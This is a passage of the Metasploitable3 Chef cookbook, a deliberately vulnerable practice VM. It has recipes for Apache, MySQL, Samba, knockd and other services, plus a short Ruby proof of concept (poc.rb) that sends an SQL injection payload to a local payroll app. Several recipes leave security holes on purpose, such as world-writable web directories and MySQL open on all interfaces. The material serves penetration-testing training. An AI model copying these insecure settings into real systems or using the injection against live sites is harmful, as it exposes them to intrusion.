https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/joker.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/king_of_spades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/king_of_spades.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/my_recordings_do_not_open.iso: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/my_recordings_do_not_open.iso -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/knockd/knockd: -------------------------------------------------------------------------------- 1 | ################################################ 2 | # 3 | # knockd's default file, for generic sys config 4 | # 5 | ################################################ 6 | 7 | # control if we start knockd at init or not 8 | # 1 = start 9 | # anything else = don't start 10 | # 11 | # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING 12 | START_KNOCKD=1 13 | 14 | # command line options 15 | #KNOCKD_OPTS="-i eth1" -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/payroll_app/poc.rb: -------------------------------------------------------------------------------- 1 | require 'net/http' 2 | 3 | url = "http://127.0.0.1/payroll_app.php" 4 | uri = URI(url) 5 | user = 'luke_skywalker' 6 | injection = "password'; select password from users where username='' OR ''='" 7 | 8 | puts "Making POST request to #{uri} with the following parameters:" 9 | puts "'user' = #{user}" 10 | puts "'password' = #{injection}" 11 | res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK') 12 | 13 | puts "Response body is #{res.body}" 14 | puts "Done" 15 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/phpmyadmin/config.inc.php: -------------------------------------------------------------------------------- 1 | 31 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/proftpd/hosts_renewer.conf: -------------------------------------------------------------------------------- 1 | description 'Run hosts renewer' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | script 6 | ruby /opt/proftpd/hosts_renewer.rb 7 | end script -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/proftpd/proftpd: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ### BEGIN INIT INFO 3 | # Provides: proftpd 4 | # Required-Start: $local_fs 5 | # Required-Stop: $local_fs 6 | # Default-Start: 2 3 4 5 7 | # Default-Stop: 0 1 6 8 | # X-Interactive: false 9 | # Short-Description: Init script for proftpd 10 | # Description: Start/stop proftpd 11 | ### END INIT INFO 12 | 13 | DESC="proftpd" 14 | NAME=proftpd 15 | #DAEMON= 16 | 17 | do_start() 18 | { 19 | echo "Starting proftpd."; 20 | /opt/proftpd/sbin/proftpd 21 | } 22 | 23 | do_stop() 24 | { 25 | echo "Stopping proftpd." 26 | killall proftpd 27 | } 28 | 29 | 30 | case "$1" in 31 | start) 32 | do_start 33 | ;; 34 | stop) 35 | do_stop 36 | ;; 37 | esac 38 | 39 | exit 0 -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/proftpd/proftpd_ip_renewer.conf: -------------------------------------------------------------------------------- 1 | description 'Run proftpd IP renewer' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | script 6 | ruby /opt/proftpd/proftpd_ip_renewer.rb 7 | end script -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/readme_app/readme_app.conf: -------------------------------------------------------------------------------- 1 | description 'Run ReadMe App' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | 6 | script 7 | sudo -u chewbacca /opt/readme_app/start.sh 8 | end script 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/samba/passdb.tdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/samba/passdb.tdb -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/Gemfile: -------------------------------------------------------------------------------- 1 | source 'https://rubygems.org' 2 | gem 'rack', '2.0.1' 3 | gem 'sinatra', '2.0.0rc2' 4 | gem 'erubis' 5 | gem 'activesupport' 6 | gem 'obfuscate' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/aws/loader: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/sinatra/aws/loader -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/sinatra.conf: -------------------------------------------------------------------------------- 1 | description 'Run vulnerable Sinatra' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | chdir /opt/sinatra/ 6 | script 7 | echo "Starting sinatra" 8 | /opt/sinatra/server 9 | end script -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/virtualbox/loader: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/sinatra/virtualbox/loader -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/unrealircd/unrealircd: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ### BEGIN INIT INFO 3 | # Provides: unrealircd 4 | # Required-Start: $local_fs 5 | # Required-Stop: $local_fs 6 | # Default-Start: 2 3 4 5 7 | # Default-Stop: 0 1 6 8 | # X-Interactive: false 9 | # Short-Description: Init script for unrealircd 10 | # Description: Start/stop unrealircd 11 | ### END INIT INFO 12 | 13 | DESC="unrealircd" 14 | NAME=unrealircd 15 | #DAEMON= 16 | 17 | do_start() 18 | { 19 | sudo -u boba_fett /opt/unrealircd/Unreal3.2/unreal start 20 | } 21 | 22 | do_stop() 23 | { 24 | /opt/unrealircd/Unreal3.2/unreal stop 25 | } 26 | 27 | 28 | case "$1" in 29 | start) 30 | do_start 31 | ;; 32 | stop) 33 | do_stop 34 | ;; 35 | esac 36 | 37 | exit 0 -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'metasploitable' 2 | maintainer 'Rapid7' 3 | maintainer_email '' 4 | license 'BSD-3-clause' 5 | description 'Installs/Configures metasploitable3' 6 | long_description 'Installs/Configures metasploitable3' 7 | version '0.1.0' 8 | 9 | # The `issues_url` points to the location where issues for this cookbook are 10 | # tracked. A `View Issues` link will be displayed on this cookbook's page when 11 | # uploaded to a Supermarket. 12 | # 13 | # issues_url 'https://github.com//metasploitable3/issues' if respond_to?(:issues_url) 14 | 15 | # The `source_url` points to the development reposiory for this cookbook. A 16 | # `View Source` link will be displayed on this cookbook's page when uploaded to 17 | # a Supermarket. 18 | # 19 | # source_url 'https://github.com//metasploitable3' if respond_to?(:source_url) 20 | 21 | depends 'apt', '~> 7.2' 22 | depends 'docker', '~> 4.9' 23 | depends 'mysql', '~> 8.3' 24 | depends 'iptables', '~> 4.5' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/apache.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: apache 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '1_apache' do 10 | lines "-A INPUT -p tcp --dport 80 -j ACCEPT" 11 | end 12 | 13 | package 'apache2' do 14 | action :install 15 | end 16 | 17 | directory '/var/www/cgi-bin' do 18 | mode '0755' 19 | recursive true 20 | end 21 | 22 | directory '/var/www/uploads' do 23 | mode '0777' 24 | recursive true 25 | end 26 | 27 | cookbook_file '/var/www/cgi-bin/hello_world.sh' do 28 | source 'apache/hello_world.sh' 29 | mode '0755' 30 | end 31 | 32 | cookbook_file '/etc/apache2/conf-available/cgi-bin.conf' do 33 | source 'apache/cgi-bin.conf' 34 | mode '0644' 35 | end 36 | 37 | cookbook_file '/etc/apache2/conf-available/dav.conf' do 38 | source 'apache/dav.conf' 39 | mode '0644' 40 | end 41 | 42 | bash "configure cgi" do 43 | code <<-EOH 44 | a2enmod cgi 45 | a2enconf cgi-bin 46 | a2disconf serve-cgi-bin 47 | EOH 48 | end 49 | 50 | bash "configure webDAV" do 51 | code <<-EOH 52 | a2enmod dav 53 | a2enmod dav_fs 54 | a2enmod dav_lock 55 | a2enmod auth_digest 56 | a2enconf dav 57 | EOH 58 | end 59 | 60 | execute 'make /var/www/html writeable' do 61 | command 'chmod o+w /var/www/html' 62 | end 63 | 64 | file '/var/www/html/index.html' do 65 | action :delete 66 | only_if { File.exists?('/var/www/html/index.html') } 67 | end 68 | 69 | service 'apache2' do 70 | action [:enable, :start] 71 | end 72 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/apache_continuum.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: apache_continuum 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '01_apache_continuum' do 10 | lines "-A INPUT -p tcp --dport 8080 -j ACCEPT" 11 | end 12 | 13 | package 'openjdk-6-jre' 14 | package 'openjdk-6-jdk' 15 | 16 | directory node[:apache_continuum][:install_dir] do 17 | owner 'root' 18 | group 'root' 19 | mode '0644' 20 | end 21 | 22 | remote_file "#{Chef::Config[:file_cache_path]}/#{node[:apache_continuum][:tar]}" do 23 | source "#{node[:apache_continuum][:download_url]}/#{node[:apache_continuum][:tar]}" 24 | mode '0644' 25 | end 26 | 27 | execute "extract apache continum" do 28 | cwd Chef::Config[:file_cache_path] 29 | command "tar -xvzf #{node[:apache_continuum][:tar]} -C #{node[:apache_continuum][:install_dir]}" 30 | 31 | not_if { ::File.exists?(File.join(node[:apache_continuum][:install_dir], 'apache-continuum-1.4.2'))} 32 | end 33 | 34 | bash 'Download and extract Apache Continuum 1.4.2' do 35 | cwd File.join(node[:apache_continuum][:install_dir],'apache-continuum-1.4.2') 36 | code <<-EOH 37 | rm bin/wrapper-linux-x86-32 38 | rm -rf data 39 | tar --warning=no-unknown-keyword -xvzf #{File.join(Chef::Config[:file_cache_path], 'cookbooks', 'metasploitable', 'files', 'apache_continuum', 'data.tar.gz')} -C #{File.join(node[:apache_continuum][:install_dir], 'apache-continuum-1.4.2')} 40 | EOH 41 | end 42 | 43 | link '/etc/init.d/continuum' do 44 | to File.join(node[:apache_continuum][:install_dir], 'apache-continuum-1.4.2', 'bin', 'continuum') 45 | end 46 | 47 | execute "set port for apache continuum" do 48 | command 'update-rc.d continuum defaults 80' 49 | end 50 | 51 | service 'continuum' do 52 | action [:enable, :start] 53 | end 54 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/chatbot.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: chatbot 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | 9 | include_recipe 'metasploitable::ruby23' 10 | include_recipe 'metasploitable::nodejs' 11 | include_recipe 'iptables::default' 12 | 13 | iptables_rule '1_chatbot_ui' do 14 | lines "-A INPUT -p tcp --dport 80 -j ACCEPT" 15 | end 16 | 17 | iptables_rule '1_chatbot_nodejs' do 18 | lines "-A INPUT -p tcp --dport 3000 -j ACCEPT" 19 | end 20 | 21 | package 'unzip' 22 | 23 | bash "Install dependencies" do 24 | code <<-EOH 25 | npm install express 26 | npm install cors 27 | EOH 28 | end 29 | 30 | cookbook_file '/tmp/chatbot.zip' do 31 | source 'chatbot/chatbot.zip' 32 | mode '0700' 33 | end 34 | 35 | execute 'unzip chatbot' do 36 | command 'unzip /tmp/chatbot.zip -d /opt' 37 | only_if { Dir['/opt/chatbot'].empty? } 38 | notifies :run, 'execute[chown chatbot]', :immediately 39 | notifies :run, 'execute[chmod chatbot]', :immediately 40 | notifies :run, 'execute[install chatbot]', :immediately 41 | end 42 | 43 | execute 'chown chatbot' do 44 | command "chown -R root:root /opt/chatbot" 45 | end 46 | 47 | execute 'chmod chatbot' do 48 | command 'chmod -R 700 /opt/chatbot' 49 | end 50 | 51 | execute 'install chatbot' do 52 | command '/opt/chatbot/install.sh' 53 | not_if { File.exists?( '/etc/init/chatbot.conf' ) } 54 | end 55 | 56 | service 'chatbot' do 57 | supports restart: false, start: true, reload: false, status: false 58 | action [:enable, :start] 59 | end 60 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/clear_cache.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: clear_cache 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | # 'clear cache and backup that might contain sensitive information' do 8 | directory '/var/chef' do 9 | action :delete 10 | recursive true 11 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/cups.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: cups 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | package 'cups' do 10 | action :install 11 | end 12 | 13 | cookbook_file '/etc/cups/cupsd.conf' do 14 | source 'cups/cupsd.conf' 15 | mode '0644' 16 | end 17 | 18 | iptables_rule '1_cups' do 19 | lines "-A INPUT -p tcp --dport 631 -j ACCEPT" 20 | end 21 | 22 | service 'cups' do 23 | action [:enable, :restart] 24 | end 25 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/docker.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: docker 4 | # 5 | 6 | docker_service 'default' do 7 | install_method 'package' 8 | version '18.06.1' 9 | action [:create, :start] 10 | group 'docker' 11 | end 12 | 13 | group 'docker' do 14 | action [:create, :modify] 15 | append true 16 | members node[:metasploitable][:docker_users] 17 | end 18 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/ifnames.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: ifnames 4 | # 5 | 6 | # block udev persistent net rules for consistent interface naming after cloning 7 | link '/etc/udev/rules.d/75-persistent-net-generator.rules' do 8 | to '/dev/null' 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/iptables.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: iptables 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '00_established' do 10 | lines '-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT' 11 | end 12 | 13 | iptables_rule '00_lo_allow_in' do 14 | lines '-I INPUT -i lo -j ACCEPT' 15 | end 16 | 17 | iptables_rule '00_lo_allow_out' do 18 | lines '-I OUTPUT -o lo -j ACCEPT' 19 | end 20 | 21 | iptables_rule '01_ssh' do 22 | lines "-A INPUT -p tcp --dport 22 -j ACCEPT" 23 | end 24 | 25 | iptables_rule '01_icmp' do 26 | lines "-A INPUT -p icmp -j ACCEPT" 27 | end 28 | 29 | iptables_rule '999_drop_all' do 30 | lines '-A INPUT -j DROP' 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/knockd.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: knockd 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | package 'knockd' do 8 | action :install 9 | end 10 | 11 | template '/etc/knockd.conf' do 12 | source 'knockd/knockd.conf.erb' 13 | mode '0600' 14 | end 15 | 16 | cookbook_file '/etc/default/knockd' do 17 | source 'knockd/knockd' 18 | mode '0600' 19 | end 20 | 21 | execute 'remove_carriage_returns' do 22 | command "sed -i -e 's/\r//g' /etc/default/knockd" 23 | end 24 | 25 | iptables_rule '1_knockd' do 26 | lines "-I FORWARD 1 -p tcp -m tcp --dport #{node[:flags][:five_of_diamonds][:vuln_port]} -j DROP" 27 | end 28 | 29 | service 'knockd' do 30 | action [:enable, :start] 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/mysql.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: mysql 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '1_mysql' do 10 | lines "-A INPUT -p tcp --dport 3306 -j ACCEPT" 11 | end 12 | 13 | mysql_service 'default' do 14 | initial_root_password "#{node[:mysql][:root_password]}" 15 | bind_address '0.0.0.0' 16 | port '3306' 17 | action [:create, :start] 18 | end 19 | 20 | mysql_client 'default' do 21 | action :create 22 | end 23 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/nodejs.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: nodejs 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | execute 'add nodejs 4 repository' do 9 | command 'curl -sL https://deb.nodesource.com/setup_4.x | sudo -E bash -' 10 | not_if { ::File.exist?('/usr/bin/node') } 11 | end 12 | 13 | package 'nodejs' do 14 | options '--force-yes' 15 | end 16 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/payroll_app.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: payroll_app 4 | # Copyright:: 2017, Rapid7, All Rights Reserved. 5 | 6 | include_recipe 'metasploitable::mysql' 7 | include_recipe 'metasploitable::apache' 8 | include_recipe 'metasploitable::php_545' 9 | 10 | poc_dir = "/home/#{node[:users][node[:users].keys.last][:username]}/poc/payroll_app/" 11 | 12 | cookbook_file '/var/www/html/payroll_app.php' do 13 | source 'payroll_app/payroll_app.php' 14 | mode '0755' 15 | end 16 | 17 | template '/tmp/payroll.sql' do 18 | source 'payroll_app/payroll.sql.erb' 19 | mode '0755' 20 | end 21 | 22 | directory poc_dir do 23 | mode '0755' 24 | owner node[:users][node[:users].keys.last][:username] 25 | recursive true 26 | end 27 | 28 | cookbook_file "#{poc_dir}/poc.rb" do 29 | source 'payroll_app/poc.rb' 30 | mode '0755' 31 | end 32 | 33 | bash 'create payroll database and import data' do 34 | code <<-EOH 35 | mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="#{node[:mysql][:root_password]}" --execute="DROP DATABASE IF EXISTS payroll; CREATE DATABASE payroll;" 36 | mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="#{node[:mysql][:root_password]}" payroll < /tmp/payroll.sql 37 | EOH 38 | end 39 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/phpmyadmin.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: phpmyadmin 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'metasploitable::mysql' 8 | include_recipe 'metasploitable::apache' 9 | include_recipe 'metasploitable::php_545' 10 | 11 | bash "download and extract phpmyadmin" do 12 | code <<-EOH 13 | wget -c -t 3 --no-check-certificate -O /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz https://files.phpmyadmin.net/phpMyAdmin/3.5.8/phpMyAdmin-3.5.8-all-languages.tar.gz 14 | echo "a129d4f03901c047799f634b122734ab687b48975563c87adbf5dea679676e11 /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz" | shasum -a 256 --check --status 15 | tar xvfz /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz -C /var/www/html 16 | mv /var/www/html/phpMyAdmin-3.5.8-all-languages /var/www/html/phpmyadmin 17 | EOH 18 | not_if { ::File.exists?('/var/www/html/phpmyadmin') } 19 | end 20 | 21 | cookbook_file 'var/www/html/phpmyadmin/config.inc.php' do 22 | source 'phpmyadmin/config.inc.php' 23 | end 24 | 25 | service 'apache2' do 26 | action [:restart] 27 | end 28 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/readme_app.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: readme_app 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | 9 | include_recipe 'metasploitable::ruby23' 10 | include_recipe 'metasploitable::nodejs' 11 | include_recipe 'iptables::default' 12 | 13 | recipe_port = 3500 14 | 15 | iptables_rule '1_readme_app' do 16 | lines "-A INPUT -p tcp --dport #{recipe_port} -j ACCEPT" 17 | end 18 | 19 | package 'git' 20 | 21 | git '/opt/readme_app' do 22 | repository 'https://github.com/jbarnett-r7/metasploitable3-readme.git' 23 | action :checkout 24 | end 25 | 26 | directory '/opt/readme_app' do 27 | owner 'chewbacca' 28 | group 'users' 29 | mode '0644' 30 | end 31 | 32 | template '/opt/readme_app/start.sh' do 33 | variables( readme_app_port: recipe_port ) 34 | source 'readme_app/start.sh.erb' 35 | end 36 | 37 | cookbook_file '/etc/init/readme_app.conf' do 38 | source 'readme_app/readme_app.conf' 39 | mode '0644' 40 | end 41 | 42 | bash 'set permissions' do 43 | cwd '/opt/readme_app' 44 | code <<-EOH 45 | chown -R chewbacca:users . 46 | git ls-files | xargs chmod 0644 47 | git ls-files | xargs -n 1 dirname | uniq | xargs chmod 755 48 | chmod 0755 ./start.sh 49 | EOH 50 | end 51 | 52 | service 'readme_app' do 53 | supports restart: false, start: true, reload: false, status: false 54 | action [:enable, :start] 55 | end 56 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/ruby23.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: ruby23 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | 9 | apt_repository 'rvm' do 10 | uri 'ppa:brightbox/ruby-ng' 11 | end 12 | 13 | package 'ruby2.3' 14 | package 'ruby2.3-dev' 15 | package 'bundler' 16 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/samba.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: samba 3 | # Recipe:: samba 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | include_recipe 'iptables::default' 9 | 10 | iptables_rule '1_samba' do 11 | lines "-A INPUT -p tcp --dport 445 -j ACCEPT" 12 | end 13 | 14 | package 'samba' 15 | 16 | cookbook_file '/etc/samba/smb.conf' do 17 | source 'samba/smb.conf' 18 | end 19 | 20 | cookbook_file '/var/lib/samba/private/passdb.tdb' do 21 | source 'samba/passdb.tdb' 22 | mode '0600' 23 | end 24 | 25 | service 'smbd' do 26 | action [:enable, :restart] 27 | end 28 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/sinatra.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: sinatra 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | 9 | include_recipe 'metasploitable::sinatra' 10 | include_recipe 'metasploitable::ruby23' 11 | include_recipe 'iptables::default' 12 | 13 | iptables_rule '1_sinatra' do 14 | lines "-A INPUT -p tcp --dport 8181 -j ACCEPT" 15 | end 16 | 17 | server_path = node['ec2'] ? 'aws' : 'virtualbox' 18 | 19 | directory '/opt/sinatra' do 20 | mode '0777' 21 | end 22 | 23 | directory '/var/opt/sinatra' do 24 | mode '0777' 25 | end 26 | 27 | cookbook_file '/opt/sinatra/Gemfile' do 28 | source 'sinatra/Gemfile' 29 | mode '0777' 30 | end 31 | 32 | cookbook_file '/opt/sinatra/server' do 33 | source "sinatra/#{server_path}/loader" 34 | mode '0777' 35 | end 36 | 37 | cookbook_file '/etc/init/sinatra.conf' do 38 | source 'sinatra/sinatra.conf' 39 | mode '0777' 40 | end 41 | 42 | service 'sinatra' do 43 | supports restart: false, start: true, reload: false, status: false 44 | action [:enable, :start] 45 | end 46 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/sshd.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: sshd 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | cookbook_file '/etc/ssh/sshd_config' do 8 | source 'sshd/sshd_config' 9 | mode '0644' 10 | end 11 | 12 | service 'ssh' do 13 | action :restart 14 | end 15 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/users.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: users 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | uid = 1111 8 | 9 | node[:users].each do |u, attributes| 10 | user attributes[:username] do 11 | manage_home true 12 | password attributes[:password_hash] 13 | uid uid 14 | gid 100 15 | home "/home/#{attributes[:username]}" 16 | shell '/bin/bash' 17 | end 18 | uid += 1 19 | end 20 | 21 | administrator_members = node[:users].keys.find_all { |user| node[:users][user][:admin] == true } 22 | 23 | group 'sudo' do 24 | action :modify 25 | members administrator_members.map { |u| node[:users][u][:username] } 26 | append true 27 | end 28 | 29 | 30 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/vm_tools.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: vm_tools 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | if node['virtualization']['system'].match /vbox/ 8 | # This assumes the VBoxGuestAdditions.iso was added to the user's home folder in Packer 9 | bash "Install VirtualBox Guest Tools" do 10 | code <<-EOH 11 | mount /home/vagrant/VBoxGuestAdditions.iso /mnt 12 | cd /mnt 13 | ./VBoxLinuxAdditions.run 14 | EOH 15 | end 16 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/spec/spec_helper.rb: -------------------------------------------------------------------------------- 1 | require 'chefspec' 2 | require 'chefspec/berkshelf' 3 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/spec/unit/recipes/default_spec.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Spec:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | 7 | require 'spec_helper' 8 | 9 | describe 'metasploitable::default' do 10 | context 'When all attributes are default, on an unspecified platform' do 11 | let(:chef_run) do 12 | runner = ChefSpec::ServerRunner.new 13 | runner.converge(described_recipe) 14 | end 15 | 16 | it 'converges successfully' do 17 | expect { chef_run }.to_not raise_error 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/spec/unit/recipes/mysql_spec.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Spec:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | 7 | require 'spec_helper' 8 | 9 | describe 'metasploitable::mysql' do 10 | context 'When all attributes are default, on an unspecified platform' do 11 | let(:chef_run) do 12 | runner = ChefSpec::ServerRunner.new 13 | runner.converge(described_recipe) 14 | end 15 | 16 | it 'converges successfully' do 17 | expect { chef_run }.to_not raise_error 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/templates/knockd/knockd.conf.erb: -------------------------------------------------------------------------------- 1 | [options] 2 | UseSyslog 3 | <% administrator_members = node[:users].keys.find_all { |user| node[:users][user][:admin] == true } %> 4 | [openFlag] 5 | sequence = <%= administrator_members.map { |u| node[:users][u][:salary] }.join(',') %> 6 | seq_timeout = 15 7 | command = /sbin/iptables -I INPUT 1 -s %IP% -p tcp --dport <%= node[:flags][:five_of_diamonds][:vuln_port] %> -j ACCEPT 8 | tcpflags = syn 9 | cmd_timeout = 30 10 | stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport <%= node[:flags][:five_of_diamonds][:vuln_port] %> -j ACCEPT 11 | 12 | [closeFlag] 13 | sequence = <%= administrator_members.map { |u| node[:users][u][:salary] }.reverse.join(',') %> 14 | seq_timeout = 15 15 | command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport <%= node[:flags][:five_of_diamonds][:vuln_port] %> -j ACCEPT 16 | tcpflags = syn 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/templates/readme_app/start.sh.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | cd /opt/readme_app 4 | bundle install --path vendor/bundle 5 | bundle exec rails s -b 0.0.0.0 -p <%= @readme_app_port %> 6 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/apache.rb: -------------------------------------------------------------------------------- 1 | # Inspec Tests for Apache 2 | 3 | # Tests for Apache Continuum 4 | describe service'continuum' do 5 | it { should be_running } 6 | it { should be_enabled } 7 | end 8 | 9 | # Tests for Apache webserver 10 | describe service('apache2') do 11 | it { should be_running } 12 | it { should be_enabled } 13 | end 14 | 15 | describe port('80') do 16 | it { should be_listening } 17 | end 18 | 19 | # Check that the required modules are enabled. 20 | # TODO: Is there a better way than checking symlinks? 21 | cgi_mods = ['cgid.conf', 'cgid.load'] 22 | dav_mods = [ 'auth_digest.load', 